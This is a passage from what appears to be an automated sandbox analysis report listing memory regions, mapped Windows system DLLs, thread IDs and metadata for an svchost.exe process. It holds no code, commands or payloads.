end_va = 0x7ff859c64fff monitored = 0 entry_point = 0x7ff859c27970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 5189 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5190 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5191 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5192 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5193 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5194 start_va = 0x7ff85a530000 end_va = 0x7ff85a537fff monitored = 0 entry_point = 0x7ff85a531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5195 start_va = 0x7ff85a5a0000 end_va = 0x7ff85bafefff monitored = 0 entry_point = 0x7ff85a7011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5196 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5197 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5198 start_va = 0x7ff85bfc0000 end_va = 0x7ff85bfc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 5199 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5200 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5201 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5202 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5203 start_va = 0x7ff85c400000 end_va = 0x7ff85c407fff monitored = 0 entry_point = 0x7ff85c4010b0 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 5204 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5205 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5206 start_va = 0x7ff85c6f0000 end_va = 0x7ff85cb18fff monitored = 0 entry_point = 0x7ff85c718740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 5207 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5208 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5209 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5210 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5211 start_va = 0x7ff85d090000 end_va = 0x7ff85d0cafff monitored = 0 entry_point = 0x7ff85d0912f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5212 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 474 os_tid = 0xe00 Thread: id = 475 os_tid = 0xdfc Thread: id = 476 os_tid = 0xdf4 Thread: id = 477 os_tid = 0xdec Thread: id = 478 os_tid = 0x784 Thread: id = 479 os_tid = 0x740 Thread: id = 480 os_tid = 0x73c Thread: id = 481 os_tid = 0x738 Thread: id = 482 os_tid = 0x734 Thread: id = 483 os_tid = 0x730 Thread: id = 484 os_tid = 0x728 Thread: id = 485 os_tid = 0x724 Thread: id = 486 os_tid = 0x720 Thread: id = 487 os_tid = 0x71c Thread: id = 488 os_tid = 0x684 Thread: id = 489 os_tid = 0x604 Thread: id = 490 os_tid = 0x600 Thread: id = 491 os_tid = 0x5ec Thread: id = 492 os_tid = 0x5e4 Process: id = "37" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3478e000" os_pid = "0x624" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:00013afd" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4089 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4090 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4091 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4092 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4093 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4094 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4095 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4096 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4097 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4098 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4099 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4100 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4101 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4102 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4103 start_va = 0x410000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4104 start_va = 0x420000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4105 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4106 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4107 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 4108 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4109 start_va = 0x550000 end_va = 0x557fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "staterepository-machine.srd-shm" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\StateRepository-Machine.srd-shm" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\staterepository-machine.srd-shm") Region: id = 4110 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 4111 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4112 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 4113 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 4114 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 4115 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 4116 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4117 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 4118 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 4119 start_va = 0x5f0000 end_va = 0x5f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 4120 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 4121 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4122 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 4123 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 4124 start_va = 0xb20000 end_va = 0xf1afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 4125 start_va = 0xf20000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 4126 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 4127 start_va = 0x1030000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001030000" filename = "" Region: id = 4128 start_va = 0x1040000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 4129 start_va = 0x1050000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001050000" filename = "" Region: id = 4130 start_va = 0x1060000 end_va = 0x1060fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 4131 start_va = 0x1070000 end_va = 0x1070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 4132 start_va = 0x1080000 end_va = 0x1080fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 4133 start_va = 0x1090000 end_va = 0x1093fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 4134 start_va = 0x10a0000 end_va = 0x10a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 4135 start_va = 0x10b0000 end_va = 0x10b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 4136 start_va = 0x10c0000 end_va = 0x10c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 4137 start_va = 0x10d0000 end_va = 0x10d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 4138 start_va = 0x10e0000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 4139 start_va = 0x1100000 end_va = 0x1106fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 4140 start_va = 0x1110000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4141 start_va = 0x1120000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4142 start_va = 0x1130000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4143 start_va = 0x1140000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4144 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4145 start_va = 0x1160000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4146 start_va = 0x1170000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4147 start_va = 0x1180000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4148 start_va = 0x1190000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4149 start_va = 0x11a0000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4150 start_va = 0x11b0000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4151 start_va = 0x11c0000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4152 start_va = 0x11d0000 end_va = 0x11dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4153 start_va = 0x11e0000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4154 start_va = 0x11f0000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4155 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 4156 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 4157 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 4158 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 4159 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 4160 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 4161 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 4162 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 4163 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 4164 start_va = 0x1b00000 end_va = 0x1e36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4165 start_va = 0x1e40000 end_va = 0x2e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 4166 start_va = 0x2e40000 end_va = 0x2e4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4167 start_va = 0x2e50000 end_va = 0x2e5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4168 start_va = 0x2e60000 end_va = 0x2e6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4169 start_va = 0x2e70000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4170 start_va = 0x2e80000 end_va = 0x2e8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4171 start_va = 0x2e90000 end_va = 0x2e9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4172 start_va = 0x2ea0000 end_va = 0x2eaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4173 start_va = 0x2eb0000 end_va = 0x2ebffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4174 start_va = 0x2ec0000 end_va = 0x2ecffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4175 start_va = 0x2ed0000 end_va = 0x2edffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4176 start_va = 0x2ee0000 end_va = 0x2eeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4177 start_va = 0x2ef0000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4178 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 4179 start_va = 0x3000000 end_va = 0x300ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4180 start_va = 0x3010000 end_va = 0x301ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = 